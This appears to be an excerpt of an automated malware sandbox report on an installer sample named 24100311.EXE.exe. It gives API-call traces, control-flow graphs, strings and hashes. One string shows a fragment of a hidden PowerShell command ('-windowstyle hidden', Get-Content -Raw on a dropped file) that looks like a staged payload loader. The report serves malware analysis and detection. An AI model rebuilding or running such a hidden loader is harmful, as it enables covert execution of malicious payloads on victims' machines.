                                                  • FindFirstFileW.KERNELBASE(74DF3420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 004068A5
                                                  • FindClose.KERNEL32(00000000), ref: 004068B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                  • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
                                                  • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                  • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402911
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: a4cb163a7d91971bb3cc2f8413b65b1a08e5d81cfbd66f3d87d9e3c78b3df682
                                                  • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
                                                  • Opcode Fuzzy Hash: a4cb163a7d91971bb3cc2f8413b65b1a08e5d81cfbd66f3d87d9e3c78b3df682
                                                  • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 188 403fb9-403fcb 189 403fd1-403fd7 188->189 190 40410c-40411b 188->190 189->190 191 403fdd-403fe6 189->191 192 40416a-40417f 190->192 193 40411d-404165 GetDlgItem * 2 call 404492 SetClassLongW call 40140b 190->193 194 403fe8-403ff5 SetWindowPos 191->194 195 403ffb-403ffe 191->195 197 404181-404184 192->197 198 4041bf-4041c4 call 4044de 192->198 193->192 194->195 200 404000-404012 ShowWindow 195->200 201 404018-40401e 195->201 203 404186-404191 call 401389 197->203 204 4041b7-4041b9 197->204 207 4041c9-4041e4 198->207 200->201 208 404020-404035 DestroyWindow 201->208 209 40403a-40403d 201->209 203->204 219 404193-4041b2 SendMessageW 203->219 204->198 206 40445f 204->206 214 404461-404468 206->214 212 4041e6-4041e8 call 40140b 207->212 213 4041ed-4041f3 207->213 215 40443c-404442 208->215 217 404050-404056 209->217 218 40403f-40404b SetWindowLongW 209->218 212->213 222 4041f9-404204 213->222 223 40441d-404436 DestroyWindow KiUserCallbackDispatcher 213->223 215->206 221 404444-40444a 215->221 224 4040f9-404107 call 4044f9 217->224 225 40405c-40406d GetDlgItem 217->225 218->214 219->214 221->206 229 40444c-404455 ShowWindow 221->229 222->223 230 40420a-404257 call 406579 call 404492 * 3 GetDlgItem 222->230 223->215 224->214 226 40408c-40408f 225->226 227 40406f-404086 SendMessageW IsWindowEnabled 225->227 231 404091-404092 226->231 232 404094-404097 226->232 227->206 227->226 229->206 258 404261-40429d ShowWindow KiUserCallbackDispatcher call 4044b4 EnableWindow 230->258 259 404259-40425e 230->259 235 4040c2-4040c7 call 40446b 231->235 236 4040a5-4040aa 232->236 237 404099-40409f 232->237 235->224 239 4040e0-4040f3 SendMessageW 236->239 241 4040ac-4040b2 236->241 237->239 240 4040a1-4040a3 237->240 239->224 240->235 244 4040b4-4040ba call 40140b 241->244 245 4040c9-4040d2 call 40140b 241->245 256 4040c0 244->256 245->224 254 4040d4-4040de 245->254 254->256 256->235 262 4042a2 258->262 263 40429f-4042a0 258->263 259->258 264 4042a4-4042d2 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 4042d4-4042e5 SendMessageW 264->265 266 4042e7 264->266 267 4042ed-40432c call 4044c7 call 403f9a call 40653c lstrlenW call 406579 SetWindowTextW call 401389 265->267 266->267 267->207 278 404332-404334 267->278 278->207 279 40433a-40433e 278->279 280 404340-404346 279->280 281 40435d-404371 DestroyWindow 279->281 280->206 282 40434c-404352 280->282 281->215 283 404377-4043a4 CreateDialogParamW 281->283 282->207 284 404358 282->284 283->215 285 4043aa-404401 call 404492 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 283->285 284->206 285->206 290 404403-404416 ShowWindow call 4044de 285->290 292 40441b 290->292 292->215
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
                                                  • ShowWindow.USER32(?), ref: 00404012
                                                  • DestroyWindow.USER32 ref: 00404026
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404042
                                                  • GetDlgItem.USER32(?,?), ref: 00404063
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
                                                  • IsWindowEnabled.USER32(00000000), ref: 0040407E
                                                  • GetDlgItem.USER32(?,00000001), ref: 0040412C
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404136
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
                                                  • GetDlgItem.USER32(?,00000003), ref: 00404247
                                                  • ShowWindow.USER32(00000000,?), ref: 00404268
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040427A
                                                  • EnableWindow.USER32(?,?), ref: 00404295
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
                                                  • EnableMenuItem.USER32(00000000), ref: 004042B2
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
                                                  • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
                                                  • SetWindowTextW.USER32(?,00423748), ref: 0040431B
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040444F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: H7B
                                                  • API String ID: 3282139019-2300413410
                                                  • Opcode ID: baf4e7a206198340e70a19425564cab513a6069eacfac64f5b5b997afbf4e255
                                                  • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
                                                  • Opcode Fuzzy Hash: baf4e7a206198340e70a19425564cab513a6069eacfac64f5b5b997afbf4e255
                                                  • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 293 403c0b-403c23 call 406931 296 403c25-403c35 call 406483 293->296 297 403c37-403c6e call 40640a 293->297 304 403c91-403cba call 403ee1 call 405f19 296->304 302 403c70-403c81 call 40640a 297->302 303 403c86-403c8c lstrcatW 297->303 302->303 303->304 311 403cc0-403cc5 304->311 312 403d4c-403d54 call 405f19 304->312 311->312 313 403ccb-403cf3 call 40640a 311->313 318 403d62-403d87 LoadImageW 312->318 319 403d56-403d5d call 406579 312->319 313->312 320 403cf5-403cf9 313->320 322 403e08-403e10 call 40140b 318->322 323 403d89-403db9 RegisterClassW 318->323 319->318 325 403d0b-403d17 lstrlenW 320->325 326 403cfb-403d08 call 405e3e 320->326 334 403e12-403e15 322->334 335 403e1a-403e25 call 403ee1 322->335 327 403ed7 323->327 328 403dbf-403e03 SystemParametersInfoW CreateWindowExW 323->328 332 403d19-403d27 lstrcmpiW 325->332 333 403d3f-403d47 call 405e11 call 40653c 325->333 326->325 331 403ed9-403ee0 327->331 328->322 332->333 338 403d29-403d33 GetFileAttributesW 332->338 333->312 334->331 346 403e2b-403e45 ShowWindow call 4068c1 335->346 347 403eae-403eaf call 405677 335->347 339 403d35-403d37 338->339 340 403d39-403d3a call 405e5d 338->340 339->333 339->340 340->333 354 403e51-403e63 GetClassInfoW 346->354 355 403e47-403e4c call 4068c1 346->355 350 403eb4-403eb6 347->350 352 403ed0-403ed2 call 40140b 350->352 353 403eb8-403ebe 350->353 352->327 353->334 356 403ec4-403ecb call 40140b 353->356 359 403e65-403e75 GetClassInfoW RegisterClassW 354->359 360 403e7b-403e9e DialogBoxParamW call 40140b 354->360 355->354 356->334 359->360 364 403ea3-403eac call 403b5b 360->364 364->331
                                                  APIs
                                                    • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                    • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                                  • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\24100311.EXE.exe",00000000), ref: 00403C8C
                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Decentraliseringers\misdidived,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420), ref: 00403D0C
                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Decentraliseringers\misdidived,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D2A
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Decentraliseringers\misdidived), ref: 00403D73
                                                    • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                                                  • RegisterClassW.USER32(00429200), ref: 00403DB0
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC8
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DFD
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403E33
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403E5F
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403E6C
                                                  • RegisterClassW.USER32(00429200), ref: 00403E75
                                                  • DialogBoxParamW.USER32(?,00000000,00403FB9,00000000), ref: 00403E94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\24100311.EXE.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Decentraliseringers\misdidived$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-1751133988
                                                  • Opcode ID: 92681064c2eb18a8eb976b4004cb2b2121f5eb92f5676c9d8e5c00cebc89f70e
                                                  • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
                                                  • Opcode Fuzzy Hash: 92681064c2eb18a8eb976b4004cb2b2121f5eb92f5676c9d8e5c00cebc89f70e
                                                  • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 367 403068-4030b6 GetTickCount GetModuleFileNameW call 406032 370 4030c2-4030f0 call 40653c call 405e5d call 40653c GetFileSize 367->370 371 4030b8-4030bd 367->371 379 4030f6 370->379 380 4031db-4031e9 call 402fc6 370->380 372 403302-403306 371->372 382 4030fb-403112 379->382 386 4032ba-4032bf 380->386 387 4031ef-4031f2 380->387 384 403114 382->384 385 403116-40311f call 40357a 382->385 384->385 394 403125-40312c 385->394 395 403276-40327e call 402fc6 385->395 386->372 389 4031f4-40320c call 403590 call 40357a 387->389 390 40321e-40326a GlobalAlloc call 406a8c call 406061 CreateFileW 387->390 389->386 418 403212-403218 389->418 416 403280-4032b0 call 403590 call 403309 390->416 417 40326c-403271 390->417 399 4031a8-4031ac 394->399 400 40312e-403142 call 405fed 394->400 395->386 405 4031b6-4031bc 399->405 406 4031ae-4031b5 call 402fc6 399->406 400->405 414 403144-40314b 400->414 407 4031cb-4031d3 405->407 408 4031be-4031c8 call 406a1e 405->408 406->405 407->382 415 4031d9 407->415 408->407 414->405 421 40314d-403154 414->421 415->380 428 4032b5-4032b8 416->428 417->372 418->386 418->390 421->405 423 403156-40315d 421->423 423->405 425 40315f-403166 423->425 425->405 427 403168-403188 425->427 427->386 429 40318e-403192 427->429 428->386 430 4032c1-4032d2 428->430 431 403194-403198 429->431 432 40319a-4031a2 429->432 433 4032d4 430->433 434 4032da-4032df 430->434 431->415 431->432 432->405 436 4031a4-4031a6 432->436 433->434 435 4032e0-4032e6 434->435 435->435 437 4032e8-403300 call 405fed 435->437 436->405 437->372
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040307C
                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00403098
                                                    • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                    • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 004030E1
                                                  • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223
                                                  Strings
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
                                                  • Null, xrefs: 0040315F
                                                  • "C:\Users\user\Desktop\24100311.EXE.exe", xrefs: 00403068
                                                  • Inst, xrefs: 0040314D
                                                  • C:\Users\user\Desktop, xrefs: 004030C3, 004030C8, 004030CE
                                                  • soft, xrefs: 00403156
                                                  • Error launching installer, xrefs: 004030B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\24100311.EXE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-3265705940
                                                  • Opcode ID: 1dc0eec721484fee0a0620382b9e92bea3965d2c0a2ac150155376b746aa34ce
                                                  • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
                                                  • Opcode Fuzzy Hash: 1dc0eec721484fee0a0620382b9e92bea3965d2c0a2ac150155376b746aa34ce
                                                  • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 440 406579-406584 441 406586-406595 440->441 442 406597-4065ad 440->442 441->442 443 4065b3-4065c0 442->443 444 4067c5-4067cb 442->444 443->444 445 4065c6-4065cd 443->445 446 4067d1-4067dc 444->446 447 4065d2-4065df 444->447 445->444 449 4067e7-4067e8 446->449 450 4067de-4067e2 call 40653c 446->450 447->446 448 4065e5-4065f1 447->448 451 4067b2 448->451 452 4065f7-406635 448->452 450->449 456 4067c0-4067c3 451->456 457 4067b4-4067be 451->457 454 406755-406759 452->454 455 40663b-406646 452->455 460 40675b-406761 454->460 461 40678c-406790 454->461 458 406648-40664d 455->458 459 40665f 455->459 456->444 457->444 458->459 464 40664f-406652 458->464 467 406666-40666d 459->467 465 406771-40677d call 40653c 460->465 466 406763-40676f call 406483 460->466 462 406792-40679a call 406579 461->462 463 40679f-4067b0 lstrlenW 461->463 462->463 463->444 464->459 470 406654-406657 464->470 476 406782-406788 465->476 466->476 472 406672-406674 467->472 473 40666f-406671 467->473 470->459 477 406659-40665d 470->477 474 406676-406694 call 40640a 472->474 475 4066af-4066b2 472->475 473->472 483 406699-40669d 474->483 481 4066c2-4066c5 475->481 482 4066b4-4066c0 GetSystemDirectoryW 475->482 476->463 480 40678a 476->480 477->467 484 40674d-406753 call 4067eb 480->484 486 406730-406732 481->486 487 4066c7-4066d5 GetWindowsDirectoryW 481->487 485 406734-406738 482->485 488 4066a3-4066aa call 406579 483->488 489 40673d-406740 483->489 484->463 485->484 491 40673a 485->491 486->485 490 4066d7-4066e1 486->490 487->486 488->485 489->484 494 406742-406748 lstrcatW 489->494 496 4066e3-4066e6 490->496 497 4066fb-406711 SHGetSpecialFolderLocation 490->497 491->489 494->484 496->497 501 4066e8-4066ef 496->501 498 406713-40672a SHGetPathFromIDListW CoTaskMemFree 497->498 499 40672c 497->499 498->485 498->499 499->486 502 4066f7-4066f9 501->502 502->485 502->497
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066BA
                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Crenature,?,004055DB,Crenature,00000000), ref: 004066CD
                                                  • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,Crenature,?,004055DB,Crenature,00000000), ref: 00406709
                                                  • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406717
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00406722
                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
                                                  • lstrlenW.KERNEL32(: Completed,00000000,Crenature,?,004055DB,Crenature,00000000), ref: 004067A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\In$: Completed$Crenature$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-2156796810
                                                  • Opcode ID: 1601c4d7d9683424531442411e17d8d829d5785fc277012caaf8ee8b864246b8
                                                  • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
                                                  • Opcode Fuzzy Hash: 1601c4d7d9683424531442411e17d8d829d5785fc277012caaf8ee8b864246b8
                                                  • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
